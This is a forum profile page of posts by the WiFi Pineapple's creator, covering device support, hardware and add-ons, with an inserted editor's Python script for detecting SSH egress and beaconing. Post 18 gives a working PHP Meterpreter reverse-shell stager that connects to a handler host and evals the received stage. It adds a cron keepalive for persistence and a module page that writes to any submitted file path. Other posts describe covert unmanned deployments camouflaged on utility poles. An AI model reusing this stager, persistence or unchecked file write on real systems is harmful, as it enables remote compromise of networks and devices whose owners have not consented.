
Darren Kitchen
Root Admin
Posts: 4,887
Days Won: 248

Everything posted by Darren Kitchen

  1. Sorry about that! We'll look into some caching services. It shouldn't be under heavy load.
  2. Powering the pineapple from the USB port isn't officially supported. DC port all the way.
  3. I would be interested in seeing what Kismet has to say about this.
  4. I can't begin to express how happy I am with the latest developments. From where we were a year ago to now is astounding, and this module is a catalyst for even greater things to come. Mad props to Sebastian!
  5. From the modules page you can pin modules to the navigation bar. We understand that some features may not be as intuitive as they need to be so as we nail down technical features we will focus on usability. Thanks!
  6. As telot has pointed out the internal wifi can go into monitor mode. The single USB port can be used for storage (just format a drive in EXT4 and it shows up as /usb/). Rather than tcpdump, which would only gather packets from connected clients, you'd probably want to use airodump-ng. I see you're looking for something passive that just records what's in the air. I believe the command would be airodump-ng -w /usb/capture.pcap or something to that effect. In this configuration you would only require the pineapple, a USB drive and a battery pack. The hakshop has all of these and we're able to put together something custom if you require -- wifipineapple.com/contact
  7. Brilliant! I could really see this being useful as a "find my pineapple" feature.... You know, for when you can't remember where you left it. Or accidentally magnetically attached it to the seat in front of you on the bus... I'm so silly that way. Thirded! The pineapple is absolutely a multipurpose pentesting platform. I'm pretty sure gpsd is already supported in OpenWrt and there are likely some generic USB GPS dongles that'll work. Might need a kernel module, but hey, if this works we could always roll it into the firmware. GPS hardware aside, even the WiFi location service would be nifty as hell. In fact, Google offers an API for its WiFi location service: http://googlecode.blogspot.com/2008/10/introducing-gears-geolocation-api-for.html (or use WiGLE). 3.3v TTL. The headers on the board should work no problem. I believe it's /dev/tty0 or something similar. Haven't had a need to connect a serial device but there's no reason boards couldn't be added to the pineapple this way.
  8. Moreover, was the pineapple working and then stopped, or had you always received a "page not found" error? Had it always blinked constantly, or is this new behavior?
  9. Just throwing this out there for anyone else with a similar problem. Since around firmware 2.0.0 the reset button on the bottom of the pineapple will reset the root password to the default "pineapplesareyummy". Boot the pineapple as usual. Wait for the WPS light to stop blinking. Then another minute after that just for good measure. Then hold the reset button (located on the bottom of the unit) for 10 seconds. Wait another minute and reboot the pineapple. Everything should be right as rain.
  10. Yep, that's the idea. Have a static relay service in the cloud whereby your pineapple and roaming laptop can meet and be friends. I'd love to hear more about your adventures in dropbox land. It's one of the features I've been meaning to give greater attention. I don't have a unit in front of me but I believe the WAN port will get an address from DHCP, thereby getting you on most networks. Unfortunately I cannot confirm that the reverse SSH connection back to home base is made only through the 3G interface. It would seem so as long as the network plugged into the WAN port doesn't become the default gateway, but again I haven't checked. Would want to make sure since the organization you're pen-testing is likely running some sort of IDS or egress filtering and SSH traffic triggers red lights. Will play around more with this as I finish the first edition of the pineapple book and focus on actual workflows for the next one. Please report back! Cheers :)
  11. Odd, should work. What about manually configuring the network? Try "sudo ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up; ping 172.16.42.1". Also you may want to disable any network managers that might be messing with your connection. The network-manager service typically found in Gnome can sometimes get in the way. Not sure about Arch but on Ubuntu it's "stop network-manager". Lastly, I did recently update the wp4.sh script to include some pretty ASCII art and clean up the wizard a bit. I don't recall messing with the heavy lifting code but just in case here's a link to the old version. Let me know if this solves your problem as I haven't experienced trouble with the new one. http://www.wifipineapple.com/wp4-1.0.sh
  12. I've seen a few modules that are "killer apps". This one, the black lister, jammer, site survey... But rather than roll everything in I like how, black lister for example, expands on existing functionality. I think in the next major release modules will be more prominent in the UI, the next obvious step from simply being able to pin 'em to the main nav bar. Think a dedicated module bar under the main nav. Just thinking out loud. This is all very exciting. The project is so much bigger than the sum of its parts and you guys are all to thank.
  13. Those goal zero kits look nice. Like I said, adventurer stuff is hella pricey. Also the MR3020s are a lot of fun, aren't they? Sensor info might be possible on the MK4 actually -- there's a serial port on there that (afaik) has yet to have been hacked :)
  14. Whistle Master, you never cease to amaze me. Kudos on the latest module!
  15. Lead acid is the way to go when it comes to solar. I too have looked into these USB solar packs and come to the same conclusion with each offering I see -- either a lame gimmick that could maybe trickle charge an iPhone, or hella expensive aimed at adventurer backpackers and the like. I prefer a more simple off the shelf inexpensive tried and true approach. So far so good.
  16. I figured I'd give a sneak preview at a new WiFi Pineapple project. We're still in testing phases but so far have the makings of a solar powered pineapple. The goal is to build a full on fruit farm using only power from the sun. These will be great for large scale unmanned covert roof-top deployments. Today is a great day for testing. After a week of non-stop usage we've had our first major foggy / cloudy day. I have high hopes for this setup, which is actually our second attempt. Now with a 3x larger panel, if the math works out this should go on for the foreseeable future (nuclear winter notwithstanding). Should have a proper rig, much slimmer and robust than the above photo, ready by end of summer in the form of an inexpensive add-on or kit along with some power saving firmware additions. Feedback and questions absolutely welcome.
  17. The Mark IV hardware is quite formidable. Here's a screenshot taken from my phone while at a target rich environment. I couldn't zoom out enough to capture all of the clients but over the course of 4 hours I completely filled the subnet. 250+ clients on our little fruity friend. Mind you this is from 1.0.0 beta! Now I can't go into much detail, but an enterprise version is already in the works with "immense firepower" so, stay tuned.
  18. So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress. Here's a screenshot of it in action using Armitage / Cobalt Strike (front-end for Metasploit): And here's a pic of the module WIP: It's based off the PHP Meterpreter. To test it launch msfconsole and use the php/meterpreter_reverse_tcp payload. Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch. Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port. Here's the php meterpreter:

      <?php
      error_reporting(0);
      # The payload handler overwrites this with the correct LHOST before sending
      # it to the victim.
      $ip = '172.16.42.42';
      $port = 4445;
      $ipf = AF_INET;
      if (FALSE !== strpos($ip, ":")) {
        # ipv6 requires brackets around the address
        $ip = "[" . $ip . "]";
        $ipf = AF_INET6;
      }
      # Pick whichever socket API this PHP build offers.
      if (($f = 'stream_socket_client') && is_callable($f)) {
        $s = $f("tcp://{$ip}:{$port}");
        $s_type = 'stream';
      } elseif (($f = 'fsockopen') && is_callable($f)) {
        $s = $f($ip, $port);
        $s_type = 'stream';
      } elseif (($f = 'socket_create') && is_callable($f)) {
        $s = $f($ipf, SOCK_STREAM, SOL_TCP);
        $res = @socket_connect($s, $ip, $port);
        if (!$res) { die(); }
        $s_type = 'socket';
      } else {
        die('no socket funcs');
      }
      if (!$s) { die('no socket'); }
      # First 4 bytes from the handler: big-endian length of the stage.
      switch ($s_type) {
        case 'stream': $len = fread($s, 4); break;
        case 'socket': $len = socket_read($s, 4); break;
      }
      if (!$len) {
        # We failed on the main socket. There's no way to continue, so
        # bail
        die();
      }
      $a = unpack("Nlen", $len);
      $len = $a['len'];
      $b = '';
      # Read until the whole stage has arrived ($b, not $B: PHP variables are case-sensitive).
      while (strlen($b) < $len) {
        switch ($s_type) {
          case 'stream': $b .= fread($s, $len - strlen($b)); break;
          case 'socket': $b .= socket_read($s, $len - strlen($b)); break;
        }
      }
      # Set up the socket for the main stage to use.
      $GLOBALS['msgsock'] = $s;
      $GLOBALS['msgsock_type'] = $s_type;
      eval($b);
      die();
      ?>

      Just change IP and Port above to what you're using. The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

      meterpreter.php

      <?php
      if (isset($_GET['start'])) {
        echo "<pre>Starting Meterpreter</pre>";
        exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");
        // if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
        //   exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
        // } else {
        //   echo "<pre><b>Meterpreter already running</b></pre>";
        // }
      }
      // Note: the target path is taken straight from the form and is not checked,
      // so any file the web server user can write is reachable through this handler.
      $filename = isset($_POST['filename']) ? $_POST['filename'] : '';
      $newdata  = isset($_POST['newdata'])  ? $_POST['newdata']  : '';
      if ($newdata != "") {
        $newdata = ereg_replace(13, "", $newdata); // strip carriage returns (ASCII 13)
        $fw = fopen($filename, 'w') or die('Could not open file!');
        $fb = fwrite($fw, stripslashes($newdata)) or die('Could not write to file');
        fclose($fw);
        $fileMessage = "Updated " . $filename . "<br /><br />";
      }
      ?>
      <html>
      <head>
      <title>Pineapple Control Center</title>
      <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
      <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
      <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
      <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
      </head>
      <body>
      <?php include_once("/www/pineapple/includes/navbar.php"); ?>
      <br><br>
      <center>
      <table width="50%">
      <tr><td>
      <div class=news>
      <div class=moduleTitle><b>Configuration</b></div>
      <div class=moduleContent>
      Edit IP address and Port below to match that of your metasploit session.
      <?php
      $filename = "/www/pineapple/modules/meterpreter/tt.php";
      $fh = fopen($filename, "r") or die("Could not open file!");
      $data = fread($fh, filesize($filename)) or die("Could not read file!");
      fclose($fh);
      // PHP_SELF is the upper-case key; htmlspecialchars keeps a '</textarea>'
      // inside the script (or a crafted URL) from breaking out of the form.
      echo "<form action='" . htmlspecialchars($_SERVER['PHP_SELF']) . "' method='post'>
      <textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>" . htmlspecialchars($data) . "</textarea>
      <input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
      <br><center><input type='submit' value='Update Meterpreter Script'>
      </form>";
      ?>
      </div>
      <br>
      <div class=moduleTitle>Meterpreter Configuration</div>
      <div class=moduleContent>
      This keep alive script will restart the Meterpreter session if it drops connection.
      </div>
      </td></tr></table></center>
      </body>
      </html>

      meterpreter-keepalive.sh

      #!/bin/sh
      # -------------------------------------------------
      # Simple keep alive script for meterpreter sessions
      # -------------------------------------------------
      logger "Meterpreter: Keep-Alive Script Executed"
      # pidof matches on process name, so this is true for any running "php" process,
      # not only tt.php.
      if ! pidof php tt.php >/dev/null; then
        php /www/pineapple/modules/meterpreter/tt.php &
        logger "Meterpreter: Connection was down, restarted."
      else
        logger "Meterpreter: Connection seems to be up."
      fi

      My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up. Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...
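Added here as an editor's example, not code from Darren's posts or from the WiFi Pineapple project: post 10 notes that a pen-tested organization's IDS or egress filtering tends to flag outbound SSH, and post 18's cron keepalive retries the reverse connection every minute whenever it is down. The script below shows what such a monitor looks like from the defender's side, run over constructed connection-log lines (the key=value log format, the 10.0.0.0/8 internal range and the SSH allowlist are all assumptions). It flags SSH leaving the network from hosts not on the allowlist, and groups of connections to the same destination that recur at a near-constant short interval, which is the signature a minute-by-minute cron retry leaves in flow logs.

```python
"""Flag outbound SSH egress and fixed-interval reconnects in connection logs."""
from collections import defaultdict
from datetime import datetime
import ipaddress

# Constructed sample records (not real traffic): timestamp then key=value pairs.
SAMPLE_LOG = """\
2012-06-10T02:00:03 src=10.0.5.17 dst=203.0.113.9 proto=tcp dport=22 dur=3600
2012-06-10T02:00:20 src=10.0.5.42 dst=203.0.113.30 proto=tcp dport=22 dur=900
2012-06-10T02:01:00 src=10.0.5.23 dst=198.51.100.7 proto=tcp dport=4445 dur=5
2012-06-10T02:02:00 src=10.0.5.23 dst=198.51.100.7 proto=tcp dport=4445 dur=4
2012-06-10T02:03:00 src=10.0.5.23 dst=198.51.100.7 proto=tcp dport=4445 dur=6
2012-06-10T02:04:01 src=10.0.5.23 dst=198.51.100.7 proto=tcp dport=4445 dur=5
2012-06-10T02:05:00 src=10.0.5.23 dst=198.51.100.7 proto=tcp dport=4445 dur=4
2012-06-10T02:07:30 src=10.0.5.99 dst=203.0.113.50 proto=tcp dport=443 dur=30
"""

# Assumed site policy: what counts as "inside", and which hosts may SSH out.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
SSH_EGRESS_ALLOWLIST = {"10.0.5.42"}  # e.g. a jump host (constructed value)


def parse_line(line):
    """Turn one 'ts k=v k=v ...' record into a dict with typed fields."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["dport"] = int(rec["dport"])
    rec["dur"] = int(rec["dur"])
    return rec


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_ssh_egress(records):
    """SSH (tcp/22) from an internal host to an external one, not allowlisted."""
    return [
        r for r in records
        if r["dport"] == 22
        and is_internal(r["src"])
        and not is_internal(r["dst"])
        and r["src"] not in SSH_EGRESS_ALLOWLIST
    ]


def find_beacons(records, min_connections=4, period_tolerance=0.25):
    """Group by (src, dst, dport) and flag repeated connects at a regular interval.

    A cron job that re-launches a reverse connection every minute produces
    gaps of ~60 s; the tolerance allows cron's few seconds of jitter.
    """
    groups = defaultdict(list)
    for r in records:
        groups[(r["src"], r["dst"], r["dport"])].append(r["ts"])
    hits = []
    for (src, dst, dport), stamps in groups.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        spread = max(abs(g - mean) for g in gaps)
        if mean > 0 and spread <= period_tolerance * mean:
            hits.append({"src": src, "dst": dst, "dport": dport,
                         "count": len(stamps), "period_s": round(mean)})
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in find_ssh_egress(recs):
        print(f"SSH egress: {r['src']} -> {r['dst']} ({r['dur']} s)")
    for h in find_beacons(recs):
        print(f"periodic reconnects: {h['src']} -> {h['dst']}:{h['dport']} "
              f"x{h['count']} every ~{h['period_s']} s")
```

On the sample data the egress check reports only 10.0.5.17 (10.0.5.42 is allowlisted), and the interval check reports the five connections to 198.51.100.7:4445 spaced about 60 seconds apart; the single HTTPS flow is ignored because it never recurs. In practice the allowlist and the interval threshold are the two knobs to tune against your own flow data before alerting on either.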
  19. This was linked to me on twitter so I thought I'd share. http://www.dragonjar.org/ocultando-la-pina-wifi-en-un-viejo-libro.xhtml The blog post isn't in English, but pictures are worth a thousand words.
  20. From the Advanced menu, what does your route configuration look like? It should be to the device usb0. Will test soon.
  21. I ran a Mark IV back in the 1.0.0 days at an *** party, nearly filling the 255.255.255.0 subnet, for about 4 hours housed inside a pelican case. The unit didn't even get warm! I've tested every Pelican Micro kit available. The 1010 is great if you're into modding and looking for something small. Sadly it doesn't fit much more than the PCB and our Pineapple Juice 3200 battery. 3G and WiFi antenna are outboard. The 1040 will house a pineapple, battery, antenna and perhaps a 3G dongle if stripped down. It's a good footprint but takes some finagling. The 1050 is best in my opinion. Similar footprint to the 1040 but with a deeper inside. It easily houses a pineapple and all essential accoutrements including battery pack, 3G dongle, USB hub and AWUS036NHA and both antennas without modding. We actually have these cases on order now (just finished up the paperwork to become an authorized Pelican distributor) and will have an uber elite package ready in time for DEFCON. That said I've had similar success with Otter boxes and the like. There are also plenty of good hobby boxes at Fry's or Radio Shack. I wired an on/off switch to one and applied several neodymium magnets for easy attachment to telephone poles and utility boxes. With a little spray paint you've got instant urban camouflage.
  22. I was about to say, we should add a localization mechanism and bring these guys into the fold, rather than fork. I mean, it's open source do what you will but we'll all benefit if additional modules are being developed for all languages. Sign me up for the Klingon.lang ;)